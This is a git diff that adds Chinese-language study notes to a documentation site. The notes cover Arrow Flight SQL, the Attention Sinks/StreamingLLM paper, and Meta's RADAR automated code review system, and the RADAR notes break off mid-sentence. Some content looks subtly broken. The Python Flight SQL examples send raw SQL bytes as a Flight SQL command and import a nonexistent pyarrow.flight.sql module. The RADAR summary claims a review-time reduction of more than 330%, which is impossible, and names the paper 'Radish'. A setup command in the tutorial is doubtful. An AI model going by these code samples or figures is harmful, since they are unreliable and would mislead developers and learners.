https://arxiv.org/abs/2605.30743 +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +# Arrow Flight SQL: Zero-Copy Federated Query at Scale + +## 一、从"快递"开始:为什么我们需要它 + +想象你在一家大型电商公司工作。公司有十几个数据库:订单存在 PostgreSQL 里,用户信息存在 MySQL 里,日志存在 ClickHouse 里,报表数据存在 Snowflake 里。 + +现在老板说:"给我拉一份报表,要跨所有这些库的数据。" + +传统做法是什么?你写一段 Python,用 JDBC 或 ODBC 分别连每个库,把数据拉到你的服务器上,在内存里拼起来——这就是**ETL**。问题是: + +1. **数据拷贝了多次**:每个数据库 -> 你的机器 -> 再发给别人 +2. **格式不统一**:每个数据库有自己的二进制格式,转换消耗 CPU +3. **延迟高**:数据在网络里来回穿梭 + +Arrow Flight SQL 解决了什么?它让**所有数据库共享同一种内存格式(Apache Arrow)**,查询结果可以直接跨网络以零拷贝方式传递。 + +类比:以前是每个快递公司用自己的包装箱,收到后要拆包再打包。现在所有快递公司都用标准集装箱——直接吊上车,不用拆。 + +## 二、核心概念拆解 + +### 2.1 Apache Arrow:列式内存格式 + +Arrow 是一种**列式、内存中**的数据格式。它的核心思想是:同一列的数据在内存里连续存放(比如所有整数排在一起,所有字符串排在一起),而不是像传统行式存储那样一行挨一行。 + +好处:CPU 缓存友好,向量化的 SIMD 指令可以直接处理整列数据,速度极快。 + +### 2.2 gRPC / Flight RPC:传输层 + +Arrow Flight 是基于 gRPC 的远程过程调用(RPC)框架。它定义了客户端和服务器之间如何传输 Arrow 数据块(Record Batch)。 + +你可以把它理解为一个"搬运 Arrow 数据"的标准协议。 + +### 2.3 Flight SQL:在 Flight 之上加 SQL + +Flight SQL 是 Apache Arrow 的规范文档(见 arrow.apache.org/docs/format/FlightSql.html),它在 Flight RPC 框架上增加了一组 SQL 命令: + +- 执行 SQL 查询(`CommandStatementQuery`) +- 预处理语句(`CommandPreparedStatementQuery`) +- 批量数据导入(`CommandStatementIngest`) +- 获取数据库元数据(表列表、列信息、主键等) +- 会话管理(设置 catalog/schema 等选项) + +**关键点**:查询结果不是传统的关系型结果集,而是直接以 Arrow Record Batch 流的形式返回。客户端收到后可以直接喂给 Pandas、DuckDB、DataFusion 等工具,中间**没有任何序列化/反序列化**。 + +## 三、零拷贝是什么意思? + +假设你在做数据分析: + +1. 数据库服务器执行 SQL 查询 +2. 结果以 Arrow 格式从数据库引擎内存直接发到网络上 +3. 客户端收到 Arrow Record Batch 流 +4. 客户端的查询引擎(如 DataFusion)直接消费这些 Arrow 数据 + +传统方式中,步骤 2 的数据要经过"数据库内部格式 -> JSON/Protobuf -> 网络 -> 解析 -> 内存对象"的多次转换。而 Arrow Flight SQL 让数据从数据库引擎的列式内存直接流向消费者的列式内存,格式不变、拷贝最少。 + +这就是"零拷贝"——不是完全没拷贝(网络传输本身要拷贝),而是**跳过了格式转换层**。 + +## 四、代码示例 + +### 示例 1:用 Python 执行查询 + +这是使用 `pyarrow.flight` 连接一个支持 Flight SQL 的服务器(如 DuckDB、Apache DataFusion、ClickHouse): + +```python +import pyarrow as pa +import pyarrow.flight + +# 1. 连接到 Flight SQL 服务器 +# 假设有一个运行中的 DuckDB 实例,监听 localhost:32010 +client_options = [ + ("dns_resolution_attempts", 5), +] +client = pyarrow.flight.FlightClient( + "grpc://localhost:32010", options=client_options +) + +# 2. 执行一条 SQL 查询(ad-hoc 查询) +sql_command = b"SELECT * FROM read_csv_auto('orders.csv')" + +# 获取查询结果的位置信息(FlightInfo) +descriptor = pyarrow.flight.FlightDescriptor.for_command(sql_command) +flight_info = client.get_flight_info(descriptor) + +# 3. 从返回的端点下载数据 +for endpoint in flight_info.endpoints: + for ticket in endpoint.tickets: + reader = client.do_get(ticket) + # 结果直接是 Arrow RecordBatchReader,零拷贝! + for batch in reader: + df = pa.Table.from_batches([batch]).to_pandas() + print(df.head()) +``` + +注意第 20 行:`reader` 返回的不是普通的游标或列表,而是 `RecordBatchReader`——一个流式迭代器,直接产出 Arrow 数据块。你可以把它直接送给 Pandas、Polars 或任何 Arrow 兼容的工具,**不需要 JSON 解析或 ORM 映射**。 + +### 示例 2:预处理语句 + 会话管理 + +预处理语句相当于 SQL 中的"预编译"。你先把 SQL 模板发给服务器,服务器编译好给你一个"句柄"(handle),之后你只需传参数,不需要重复解析 SQL: + +```python +import pyarrow as pa +import pyarrow.flight +import pyarrow.flight.sql + +# 1. 创建客户端并建立会话 +client = pyarrow.flight.FlightClient("grpc://localhost:32010") + +# 2. 创建预处理语句 +sql = "SELECT user_id, total FROM orders WHERE status = ? AND amount > ?" +action = pyarrow.flight.Action("CreatePreparedStatement", sql.encode()) +result = client.do_action(action) + +# 3. 服务器返回一个句柄(handle) +handle_bytes = next(result.body).to_pybytes() +handle = pa.py_buffer(handle_bytes) + +# 4. 绑定参数并执行 +# 参数值也是以 Arrow 格式发送的 +params_batch = pa.record_batch([ + pa.array(["shipped"], type=pa.string()), # status = 'shipped' + pa.array([100.0], type=pa.float64()) # amount > 100 +], names=['f0', 'f1']) + +# 用 DoPut 发送参数 + 句柄 +ticket = pyarrow.flight.Ticket(handle) +descriptor = pyarrow.flight.FlightDescriptor.for_command(handle) + +# 发送参数流 +writer, _ = client.do_put(descriptor, params_batch.schema) +writer.write_batch(params_batch) +writer.close() + +# 5. 获取结果 +flight_info = client.get_flight_info(descriptor) +for endpoint in flight_info.endpoints: + reader = client.do_get(endpoint.tickets[0]) + table = reader.read_all() + print(table.to_pandas()) + +# 6. 关闭预处理语句释放资源 +close_action = pyarrow.flight.Action( + "ClosePreparedStatement", handle_bytes +) +client.do_action(close_action) +``` + +这个例子展示了 Flight SQL 的两个重要特性: + +- **参数以 Arrow 格式传递**(不是字符串拼接,不是 JDBC 的 setString) +- **句柄机制**让预处理语句的状态在服务器端维护,客户端只需要传 handle + 参数 + +## 五、典型架构:联邦查询 + +``` +[PostgreSQL] [MySQL] [ClickHouse] [Snowflake] + | | | | + [Flight SQL Server (每库一个)] + \ | / / + \ | / / + [ Arrow Flight RPC 网络层 (gRPC, HTTP/2) ] + | + [ Arrow Record Batch 流 ] + | + [ 统一查询引擎:DataFusion / DuckDB ] + | + [ 结果:Pandas / Polars / BI 工具 ] +``` + +每个数据库前面跑一个 Flight SQL 代理(Proxy),把数据库的查询结果转换成 Arrow 格式输出。统一查询引擎通过网络拿到所有数据流后,在内存里做 JOIN、聚合等操作——**所有数据都以同一种列式格式存在**,不需要格式转换。 + +## 六、生态中的 Flight SQL 实现 + +| 实现 | 语言 | 特点 | +|------|------|------| +| DuckDB | C++ | 嵌入式,支持 in-process Flight SQL 服务器 | +| Apache DataFusion | Rust | 分布式查询引擎,Flight SQL 是一等公民 | +| ClickHouse | C++ | 内置 Flight SQL 端点 | +| RisingWave | Rust | 流式数据库,支持 Flight SQL | +| Apache Arrow Flight (官方案例) | C++/Rust | 参考实现 | + +## 七、Flight SQL vs 传统 JDBC/ODBC + +| 维度 | JDBC/ODBC | Flight SQL | +|------|-----------|------------| +| 数据格式 | 行式,驱动特定 | Arrow 列式,统一 | +| 序列化 | 驱动内部格式 | 零拷贝(同格式直接传递) | +| 传输协议 | TCP / 专有 | gRPC (HTTP/2) | +| 跨语言 | 需要对应驱动 | 任意语言只要有 Arrow 库 | +| 流式传输 | 支持但需逐行读取 | 原生支持 RecordBatch 流 | +| 预处理语句 | 标准 API | 通过 Handle 机制实现 | + +## 八、总结 + +Arrow Flight SQL 的核心价值可以用一句话概括: + +> **让 SQL 查询结果以标准化的列式内存格式在网络中流动。** + +它不取代数据库,不取代 SQL 语言,而是在"数据库"和"查询引擎"之间铺了一条高速公路——这条路的标准集装箱就是 Arrow。 + +对零基础学习者的关键 takeaway: +- Arrow 解决了"数据在不同系统间传递时的格式统一"问题 +- Flight SQL 解决了"SQL 查询结果如何高效跨网络传输"问题 +- 零拷贝的核心是"格式不变,直接传递" +- 生态正在快速增长,DuckDB 和 DataFusion 是两个最容易上手的切入点 + +## 九、进一步学习建议 + +1. 本地跑一个 DuckDB 的 Flight SQL 服务器(`pip install duckdb` + `duckdb --flight`) +2. 用上面示例 1 的 Python 代码连上去执行查询 +3. 阅读 Apache Arrow Flight SQL 官方规范:arrow.apache.org/docs/format/FlightSql.html +4. 尝试 DataFusion(Rust):https://datafusion.apache.org/ diff --git a/src/content/docs/papers/attention-sinks-2024.md b/src/content/docs/papers/attention-sinks-2024.md new file mode 100644 index 000000000..df1e6f36d --- /dev/null +++ b/src/content/docs/papers/attention-sinks-2024.md @@ -0,0 +1,229 @@ +--- +title: "Attention Sinks 与 StreamingLLM:让大模型无限流式推理" +来源: https://arxiv.org/abs/2309.17453 +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +# Attention Sinks 与 StreamingLLM:让大模型无限流式推理 + +## 1. 一个日常类比:餐厅的"注意力天花板" + +想象你去一家餐厅,服务员要记住你整个点的菜。如果点了 1000 道菜,服务员得记住 1000 个菜的详情——他的大脑(内存)会放不下。 + +一个自然的想法是:只记住最近点的 20 道菜。这就是所谓的"窗口注意力"(Window Attention)。但问题是:当你忘了最早点的几道菜时,餐厅的整套点菜系统就崩溃了。 + +为什么?因为这些最早点的菜,就像一个"注意力水坑"(Attention Sink)——即使它们不好吃,所有后面的菜都会把"注意力"(关注度)流过去,因为它们是整个菜单的开头。 + +这篇文章就是发现了这个"水坑",然后学会利用它,让餐厅能无限点菜,内存永远够用。 + +## 2. 背景知识:LLM 是怎么"说话"的 + +大语言模型(LLM)每次生成一个新词时,都要回头看之前说过的所有词。它用一种叫 **Transformer 的 Attention 机制** 来做这件事。 + +简单来说,每生成一个词,模型会先把它之前所有的词转成 **KV 对**(Key-Value pairs),缓存起来。每次需要生成新词时,就用这些 KV 去跟新词做"注意力匹配"。 + +```python +# 伪代码:传统 LLM 的注意力机制(每次都要看全部历史) +for token in input_sequence: + key, value = model.encode(token) + kv_cache.append((key, value)) # 缓存所有历史 + +# 生成新词时,注意力分数 = 对所有历史 KV 做 softmax +def attention(query, kv_cache): + scores = [] + for k, v in kv_cache: + score = query @ k.T # 计算每个历史词的匹配度 + scores.append(score) + # softmax 让所有分数加起来 = 1 + weights = softmax(scores) + return sum(w * v for w, v in zip(weights, kv_cache)) +``` + +问题就在这里:**kv_cache 会随着对话越来越长,内存爆炸。** + +## 3. 核心问题:窗口注意力为什么不工作? + +一个直观的想法:既然内存有限,那我只保留最近的 N 个词的 KV,旧的扔掉,不就行了? + +实验发现:**不行。** 一旦你扔掉了最开始的几个词,模型的表现直接崩溃。 perplexity(困惑度,衡量模型有多"困惑"的指标)从 5 暴增到 5000+。 + +作者发现,即使你把最初的词替换成毫无意义的换行符 `\n`,只要保留它们的位置,模型表现就恢复正常。这说明——**模型不关心这些词是什么意思,它关心的是它们的位置。** + +## 4. 核心概念:Attention Sink(注意力水坑) + +### 4.1 什么是 Attention Sink? + +作者发现一个有趣的现象:在 LLM 的注意力机制中,**大部分层的绝大多数注意力头,都会分配大量注意力分数给序列开头的几个词**,即使这些词跟当前要生成的词完全没有语义关系。 + +他们把这些开头的词称为 **Attention Sink(注意力水坑)**。 + +为什么会出现水坑?因为 **Softmax 函数有一个硬性约束**:它要求所有注意力分数加起来等于 1。 + +``` + softmax(x)[i] = e^x[i] / Σ_j(e^x[j]) +``` + +即使当前词不需要关注之前的任何词,softmax 也要求它"必须把注意力分配给某个地方"。于是模型就把那些"多余的注意力"灌到开头那几个词上。 + +这就像你有一杯水(注意力 = 1),即使你口渴但不想喝,你也得把水倒进水槽里,而不能让它凭空消失。开头的词就是这个水槽。 + +### 4.2 为什么是"开头"的词? + +因为 LLM 是自回归的——每个词只能看到它之前的词。开头的那些词,被几乎所有后面的词都能看到,所以它们最容易成为"被灌注意力"的目标。 + +``` +Token: I like to eat pizza . +Layer 5 注意力分布: [0.65, 0.02, 0.02, 0.02, 0.02, 0.02, 0.25] + ^^^^ 这些开头词吸收了绝大部分"多余注意力" +``` + +## 5. StreamingLLM 的解决方案:滚动 KV Cache + 保留水坑 + +StreamingLLM 的核心思路非常简单,但非常有效: + +1. **保留开头的 4 个词**的 KV(作为 Attention Sink) +2. **滚动缓存最近的 N 个词**的 KV +3. 注意力计算时,同时用这两部分 KV + +这样内存永远固定(4 + N),模型表现也稳定。 + +```python +# 核心数据结构:两个部分的 KV Cache +class StreamingKVCache: + def __init__(self, sink_size=4, window_size=2048): + self.sink_kvs = [] # 固定的:开头 4 个词的 KV + self.window_kvs = [] # 滚动的:最近 window_size 个词的 KV + self.sink_size = sink_size + self.window_size = window_size + + def add(self, key, value): + """添加新 token 的 KV""" + if len(self.sink_kvs) < self.sink_size: + self.sink_kvs.append((key, value)) # 先攒够 sink + else: + self.window_kvs.append((key, value)) + if len(self.window_kvs) > self.window_size: + self.window_kvs.pop(0) # 满了就踢掉最老的 + + def get_all_kvs(self): + """注意力计算时,返回 sink + window""" + return self.sink_kvs + self.window_kvs +``` + +### 5.1 位置编码的处理:在 cache 内的相对位置 + +一个关键细节:StreamingLLM 使用** cache 内部的相对位置**,而不是原始文本中的绝对位置。 + +比如原始文本中第 1000 个词被加入 cache 时,它在 cache 里的位置可能是 7——因为它前面的词很多已经被踢出了 window。但模型只需要知道"它是 cache 里的第 7 个",而不需要知道"它是全文的第 1000 个"。 + +```python +# 位置编码的处理方式 +def apply_rope_position_transform(keys, cache_positions): + """ + 对 cache 中的 keys 应用旋转位置编码。 + cache_positions 是 [0, 1, 2, 3, 4, 5, ...] 这样的连续位置, + 而不是原文本中的 [0, 1, 2, 3, 600, 601, ...] + """ + for i, pos in enumerate(cache_positions): + keys[i] = rotate(keys[i], pos) # 旋转角度由 cache 内位置决定 + return keys +``` + +### 5.2 为什么是 4 个词? + +实验发现:**4 个初始词就够了。** + +| 保留初始词数 | Llama-2-13B 的 Perplexity | +|---|---| +| 0(纯窗口) | 5158(崩溃) | +| 1 | 11.88 | +| 2 | 10.51 | +| 4 | 5.40 | +| 8 | 5.38(收益递减) | + +4 个词之后,增加数量几乎没有效果。 + +## 6. 进阶:预训练时加入专用的 Sink Token + +论文还提出了一个更优雅的方案:**在预训练阶段,在每个训练样本的最前面加一个特殊的"Sink Token"**。 + +这个特殊的 token 在训练过程中学会专门吸收那些"多余注意力"。结果就是: + +- 模型**只需要这一个 token** 就能稳定流式推理 +- 不需要保留任何"初始词" +- 普通任务的性能完全不受影响 + +```python +# 预训练时的处理方式 +def preprocess_for_training(text): + """在每个训练样本前加一个特殊的 sink token""" + return "" + text + # 模型学会: token = 专门吸收多余注意力的"水槽" +``` + +有了这个 Sink Token,推理时的 cache 就只有一个固定 token + 滚动窗口,更加简洁。 + +## 7. 效果对比 + +### 7.1 长文本建模(400 万字) + +StreamingLLM 让 Llama-2、MPT、Falcon、Pythia 等模型都能稳定处理超过 400 万 token 的文本: + +``` +模型 | 方法 | 4M token 的 Perplexity +--------------|-------------------|---------------------- +Llama-2-13B | Dense Attention | OOM(内存溢出) +Llama-2-13B | Window Attention | 崩溃(>5000) +Llama-2-13B | StreamingLLM | 稳定 ≈5.5 +Llama-2-70B | StreamingLLM | 稳定 ≈3.2 +``` + +### 7.2 多轮对话 + +在多轮 ARC 问答任务中: + +``` +模型 | 方法 | Arc-C 准确率 +-----------------|-------------------|------------- +Llama-2-70B-Chat | Dense (one-shot) | 78.50% +Llama-2-70B-Chat | Window Attention | 0.32%(随机) +Llama-2-70B-Chat | StreamingLLM | 80.20% +``` + +StreamingLLM 的准确率甚至超过了 off-line 的 one-shot 方法。 + +### 7.3 速度 + +StreamingLLM 比滑动窗口 + 重新计算的 baseline 快 **22.2 倍**,而且推理速度恒定,不随输入长度增加而变慢。 + +## 8. 核心贡献总结 + +1. **发现 Attention Sink 现象**:开头词的"多余注意力"不是 bug,而是 softmax 的必然结果 +2. **提出 StreamingLLM**:保留 4 个初始词 + 滚动缓存,无需微调即可流式推理 +3. **支持无限长度**:实验验证到 400 万 token 以上仍稳定 +4. **Sink Token 预训练**:在预训练时加入专用 sink token,进一步简化推理 +5. **通用性**:适用于所有使用 RoPE 或 ALiBi 位置编码的模型 + +## 9. 个人思考:从第一性原理理解 + +回到最基础的问题:为什么 Attention Sink 会出现? + +从第一性原理推导: + +1. **Softmax 是归一化的** → 所有注意力分数之和必须等于 1 +2. **模型不需要在所有位置都有强注意力** → 但它仍然需要分配注意力值 +3. **分配给谁?最"全局可见"的词最合适** → 开头词被所有后续词覆盖 +4. **开头词成为"水槽"** → 多余注意力自然流向它们 + +这个推导不依赖于任何特定模型,它来自于 softmax 的数学性质和自回归建模的结构特性。这也是为什么 Llama、MPT、Falcon 等不同架构的模型都出现了相同的现象。 + +理解了这一点,StreamingLLM 的解决方案就变得非常自然:**既然开头词注定要被分配注意力,那就永远保留它们。** 这就像治水——不是堵住水流,而是修一个水槽。 + +## 10. 延伸阅读 + +- 原始论文:https://arxiv.org/abs/2309.17453 +- 代码仓库:https://github.com/mit-han-lab/streaming-llm +- 相关方向:FlashAttention、LongChat(RoPE 外推)、ALiBi(位置偏置) diff --git a/src/content/docs/papers/attention.md b/src/content/docs/papers/attention.md index 14573c306..bad518f00 100644 --- a/src/content/docs/papers/attention.md +++ b/src/content/docs/papers/attention.md @@ -150,6 +150,8 @@ base 模型 8 个头独立学:头 1 学语法(主语↔谓语)、头 2 学 - [[filip-2021]] —— FILIP — 把 CLIP 的图文对齐细化到 token 级 - [[flamingo-2022]] —— Flamingo — 让冻结的大模型学会看图,几张样例就上手 - [[flash-attention]] —— FlashAttention — 不改算法,只改数据怎么进 GPU +- [[flashattention-2]] —— FlashAttention-2 — 更快的 Attention 与更好的并行 +- [[flashattention-3-2024]] —— FlashAttention-3 — Hopper 上的异步 Attention 与 FP8 低精度 - [[gat-2018]] —— GAT — 让图神经网络的邻居自带权重 - [[gcn-2017]] —— GCN 2017 — 把卷积搬到图结构上的最简版本 - [[goodfellow-fgsm-2014]] —— FGSM — 用一行梯度让神经网络看错图片 @@ -183,6 +185,7 @@ base 模型 8 个头独立学:头 1 学语法(主语↔谓语)、头 2 学 - [[neumf-2017]] —— NeuMF — 用神经网络替掉推荐系统的内积 - [[nickolls-dally-2010-cuda-era]] —— Nickolls-Dally 2010 — GPU 怎么从画三角形变成跑 AI - [[orca-continuous-batching]] —— Orca — 让一批 LLM 请求随到随走,不再排队等最长那个 +- [[paged-attention-vllm]] —— PagedAttention 与 vLLM — 零基础学习笔记 - [[parti-2022]] —— Parti — 把文生图当作翻译,用自回归 Transformer 一像素接一像素地写 - [[pascal-architecture-2016]] —— NVIDIA Pascal P100 — HBM2 + NVLink + FP16 让 Tesla 真正变成 AI 卡 - [[performer-2020]] —— Performer — 用随机特征把 softmax attention 拉成线性复杂度 diff --git a/src/content/docs/papers/automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208.md b/src/content/docs/papers/automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208.md new file mode 100644 index 000000000..0c89df94b --- /dev/null +++ b/src/content/docs/papers/automating-low-risk-code-review-at-meta-radar-arxiv-2605-30208.md @@ -0,0 +1,398 @@ +--- +title: Automating Low-Risk Code Review at Meta RADAR +来源: https://arxiv.org/abs/2605.30208 +日期: 2026-06-13 +分类: 其他 +子分类: 工程文化 +provenance: pipeline-v3 +--- + +# Automating Low-Risk Code Review at Meta: RADAR + +## 一、引言:为什么要自动化代码审查 + +### 1.1 一个日常类比 + +想象你在一家大型超市工作,每天有成千上万的商品需要上架。过去,每个商品都要经理亲自检查一遍标签、价格、保质期。后来超市引入了自助扫描和 AI 摄像头,低风险的简单商品(比如一包已知品牌的盐)可以直接上架,只有异常商品(比如价格标签跟系统对不上)才需要经理介入。 + +RADAR 做的就是一件事:**把低风险代码变更自动通过代码审查**,让人类只关注真正有风险的部分。 + +### 1.2 背景与动机 + +Meta 的软件开发模式有几个关键特点: + +- 使用 **Phabricator** 作为代码审查平台(类似 GitHub 的 PR 系统) +- 每个代码变更叫 **diff**(difference 的缩写) +- 代码必须经过 peer review(同事审查)+ 自动化测试 + 逐步部署 +- 所有代码在**单体仓库(monorepo)**中管理 + +但 AI 编码工具改变了游戏规则: + +| 指标 | 年增长率 | +|------|---------| +| 每次 diff 的有效代码行数 | +105.9% | +| 每个开发者每月 diff 数量 | +51% | +| agentic AI 贡献的增长 | >80% | + +与此同时,24 小时内被及时审查的 diff 比例却在下降。这意味着:**代码的生产速度远超人类审查的能力**。 + +在这个背景下,Radish 论文提出三个研究问题: + +1. **可行性(Feasibility)**:风险分级的自动化能否在大规模下运行? +2. **校准(Calibration)**:调整风险阈值如何影响自动化产出与安全性之间的权衡? +3. **影响(Impact)**:自动化审查能在多大程度上减少 AI 生成代码的端到端延迟? + +## 二、核心概念拆解 + +### 2.1 RADAR 是什么 + +RADAR = **R**isk **A**ware **D**iff **A**uto **R**eview(风险感知 diff 自动审查) + +它是一个**多阶段漏斗(multi-stage funnel)**,每一层都像安检一样逐步筛选: + +``` +diff 进入 + | + +-> 第1层:作者身份分类(人类 / 机器) + | + +-> 第2层:准入资格检查(eligibility gates) + | + +-> 第3层:静态启发式规则(static heuristics) + | + +-> 第4层:Diff Risk Score(机器学习模型打分) + | + +-> 第5层:LLM 自动化代码审查(ACR) + | + +-> 第6层:确定性验证(deterministic validation) + | + +-> 通过:自动合入(auto-land) + +-> 未通过:转人工审查 +``` + +### 2.2 RACER:AI 代码生成工具 + +在讲 RADAR 之前,需要先认识它的"搭档"**RACER**(Risk-Aware Code Editing and Refactoring): + +- RACER 是一个 AI 工具,帮开发者自动生成代码变更 +- 开发者写一个**runbook**(操作手册),告诉 RACER 要做什么 +- RACER 在沙箱里生成 diff,跑验证,提交审查 +- RACER 每天约生成 3,000 个 diff,其中 59% 不需要人类修改就落地 + +**关键关系**:RACER 生成的 diff 是 RADAR 的主要输入来源之一。 + +### 2.3 Diff Risk Score (DRS):核心打分模型 + +DRS 是 RADAR 的心脏。它做的事情是:**预测一个 diff 有多大可能引发线上事故(Production Incident)**。 + +DRS 的打分方式是百分位制: + +- **P5** = 只有最安全的 5% 的 diff 能通过 +- **P20** = 最安全的 20% 能通过 +- **P50** = 最安全的 50% 能通过 + +打个比方:学校考试,P5 就是"全班只有前 5% 的学生能及格",P50 就是"全班前 50% 能及格"。P 值越低,门槛越严格。 + +DRS 原本是为代码冻结期(code freeze)低风险的 diff 能直接合入而开发的,现在已扩展到 Meta 约 20 个风险感知功能。 + +### 2.4 Automated Code Review (ACR):LLM 做审查 + +ACR 是一个基于大语言模型的代码审查智能体: + +- 它不仅看 diff 的元数据(文件路径、行数),还能**理解代码的实际语义** +- 它把 diff 中的每个变更分类为 **安全信号** 或 **风险信号** + +**安全信号**的例子: + +- 重构(不改行为) +- 删除死代码 +- 增加防御性编程 +- 添加日志 +- 纯格式修改 +- 文档/注释更新 + +**风险信号**的例子: + +- 高复杂度变更(复杂度评分 >= 4) +- 重大结构性变更 +- 识别出的 bug 或逻辑错误 +- 性能风险 +- 安全漏洞(密钥泄露、SQL 注入、认证绕过) + +ACR 的 auto-accept 条件非常严格: + +- 置信度 >= 8/10 +- 所有变更都归类为安全类别 +- 任何一个风险信号都会导致自动不合格 + +## 三、RADAR 的准入模型(Eligibility Model) + +RADAR 最独特的设计在于:**不同的 diff 走不同的准入路径**。 + +### 3.1 第一层:作者分类 + +``` +diff + | + +-- 人类写的 (Human authored) + | | + | +--> 进入 RADAR Verification + Approval 管道 + | + +-- 机器写的 (Bot authored) + | + +-- 确定性 codemod (Deterministic codemod) + | | + | +--> Blanket AutoAccept(完全自动,无需逐 diff 审查) + | + +-- AI 生成的 codemod + | + +--> Conditional AutoAccept(需逐 diff 过 ACE 管道) + | + +-- RACER runbook + | + +--> 按 runbook 单独评估(最细粒度) +``` + +### 3.2 三种机器 diff 的准入方式 + +**方式 1:确定性 codemod → Blanket AutoAccept** + +确定性 codemod 是那种"输入已知代码,输出确定代码"的转换,比如 API 迁移、import 整理。因为转换本身经过审核,所以 diff 可以**直接全量通过**,不需要逐 diff 审查。 + +**方式 2:AI 生成的 codemod → Conditional AutoAccept** + +AI 生成的 codemod 每次输出的 diff 可能不同(因为 AI 会根据上下文生成),所以每个 diff 都要单独走 ACE 管道(包括 DRS 打分 + ACR 审查)。 + +**方式 3:RACER runbook → 逐 runbook 评估** + +这是最细粒度的方式。每个 RACER runbook 要满足四个条件: + +1. **风险历史**:过去 60 天内零线上事故、低回退率、低拒绝率 +2. **每日限额**:防止单个 runbook 淹没提交队列 +3. **DRS 阈值**:可信 runbook 用 P50,新 runbook 用 P20 +4. **黑名单**:出过事故的 runbook 永久禁止自动合入 + +## 四、代码示例 + +### 4.1 示例 1:DRS 阈值配置(YAML) + +不同 runbook 可以配置不同的 DRS 阈值: + +```yaml +# 高风险 runbook:严格的 P20 阈值 +runbook: "fix-dead-code-cleanup" + risk_threshold: P20 # 只有最安全的 20% diff 能过 + daily_limit: 500 # 每天最多 500 个 diff + allowlist: false # 未列入白名单,用严格阈值 + +# 低风险 runbook:宽松的 P50 阈值 +runbook: "api-migration-v2" + risk_threshold: P50 # 最安全的 50% diff 能过 + daily_limit: 2000 # 每天最多 2000 个 diff + allowlist: true # 已列入白名单(60天零事故) + +# 被拉黑的 runbook +runbook: "auth-module-refactor" + status: BLOCKED # 出过线上事故,永久禁止 + reason: "caused PI-2026-0315" +``` + +**设计意图**:同一个工具,不同 runbook 的待遇可以完全不同。安全记录好的 runbook 享受更宽松的阈值,出过问题的 runbook 被限制甚至拉黑。 + +### 4.2 示例 2:ACR 安全/风险信号分类 + +ACR 对 diff 中的每个变更做语义分类: + +```python +# ACR 看到的 diff 片段 +diff --git a/server/auth.py b/server/auth.py +@@ -42,6 +42,11 @@ def login(user, password): ++ if not user: ++ return {"error": "missing user"} ++ + hashed = hash_password(password) + if not verify_signature(user, hashed): + raise AuthenticationError("invalid credentials") +``` + +ACR 的分析结果: + +```yaml +change_id: "auth.py:43-44" + classification: SAFE + signal: "defensive_programming_addition" # 防御性编程 + confidence: 9.2 + description: "Added null check for user parameter" + +change_id: "auth.py:46" + classification: SAFE + signal: "no_behavioral_change" # 不影响行为 + confidence: 8.5 + description: "Whitespace-only formatting" +``` + +**总结**:所有变更都被分类为 SAFE,且置信度都 > 8,ACR 会给出 auto-accept 决策。 + +### 4.3 示例 3:一个被自动拒绝的 diff + +```python +# ACR 看到的 diff 片段 +diff --git a/api/payment.py b/api/payment.py +@@ -15,7 +15,7 @@ def process_payment(user_id, amount): +- user = get_user(user_id) ++ user = get_user(request.params['user_id']) +``` + +ACR 的分析结果: + +```yaml +change_id: "payment.py:18" + classification: RISK + signal: "potential_security_vulnerability" # 潜在安全漏洞 + confidence: 9.1 + description: "Changed from trusted parameter to raw request param. + Possible injection vector. Behavior change detected." +``` + +**总结**:检测到风险信号 → ACR 自动拒绝 → diff 转人工审查。 + +## 五、核心数据与成果 + +### 5.1 规模数据 + +| 指标 | 数值 | +|------|------| +| RADAR 审查的 diff 总数 | 535,000+ | +| 成功自动合入的 diff | 331,000+ | +| 日均处理 diff | 25,000+ | +| 当前 approve 率 | 60.31% | + +### 5.2 安全性数据 + +| 指标 | RADAR diff | 非 RADAR diff | 对比 | +|------|-----------|--------------|------| +| 回退率 (Revert rate) | 低 | 基准 | 1/3 | +| 线上事故率 (PI rate) | 极低 | 基准 | 1/50 | + +### 5.3 效率数据 + +| 指标 | 改善幅度 | +|------|---------| +| 中位关闭时间 (median time to close) | 减少 >330% | +| 中位审查等待时间 (median review wall time) | 减少 35% | + +### 5.4 阈值调优实验 + +将 DRS 阈值从 P25(最安全的前 25%)放宽到 P50(最安全的前 50%): + +- approve 率上升到 **60.31%** +- 安全性指标(回退率/事故率)保持在可接受范围内 +- 说明 **阈值调节是一个可控的安全-效率平衡旋钮** + +## 六、两个管道的详细流程 + +### 6.1 AI / Bot diff 管道(ACE 管道) + +``` +Bot diff 进入 + | + +-> 确定 codemod? + | +-- 是 -> Blanket AutoAccept -> 合入 + | +-- 否 -> 进入 ACE 管道 + | + +-> ACE 管道: + | | + | +-> DRS 打分 (P20 或 P50 取决于是否白名单) + | +-> ACR 审查 (语义分析, 安全/风险分类) + | +-> 确定性验证 (CI, 测试, 静态分析) + | +-> 全部通过 -> 自动合入 + | +-> 任何一层失败 -> 转人工审查 +``` + +### 6.2 人类 diff 管道(Verification + Approval 管道) + +``` +人类 diff 进入 + | + +-> 作者资格检查 + | | + | +-> 角色/经验是否达标? + | +-> 是否拥有此代码的运营权? + | + +-> 范围排除检查 + | | + | +-> 是否涉及开源代码? -> 排除 + | +-> 是否涉及 SOX 合规代码? -> 排除 + | + +-> Diff 状态检查 + | | + | +-> 不是 WIP? + | +-> 不是 RFC? + | +-> 不是之前被拒绝的? + | +-> 是最新版本? + | + +-> 内容检查 + | | + | +-> 无黑名单关键词? + | +-> 不匹配黑名单文件后缀? + | + +-> 全部通过 -> 进入 RADAR Verification + Approval + | + +-> DRS P5 (最安全的前 5%) + +-> ACR 审查 + +-> 全部通过 -> 自动合入(RADAR Approval) + +-> 任何一层失败 -> 转人工审查 +``` + +## 七、关键设计哲学 + +### 7.1 分层安检 + +RADAR 不是"用一个模型搞定一切",而是层层递进: + +1. **静态规则** 快速过滤(文件路径、大小、类型) +2. **DRS 模型** 做风险预测 +3. **ACR 审查** 做语义理解 +4. **确定性验证** 做最终保证 + +每一层都只把"足够确定"的 diff 放过去,把"拿不准"的交给下一层或人类。 + +### 7.2 渐进式部署 + +RADAR 支持**渐进式 rollout**: + +- 先让低风险 runbook 跑 +- 监控安全指标 +- 确认没问题再放宽阈值 +- 出问题时立即暂停某个 runbook + +### 7.3 不同来源,不同信任度 + +这是 RADAR 最核心的创新之一:**不把所有 bot 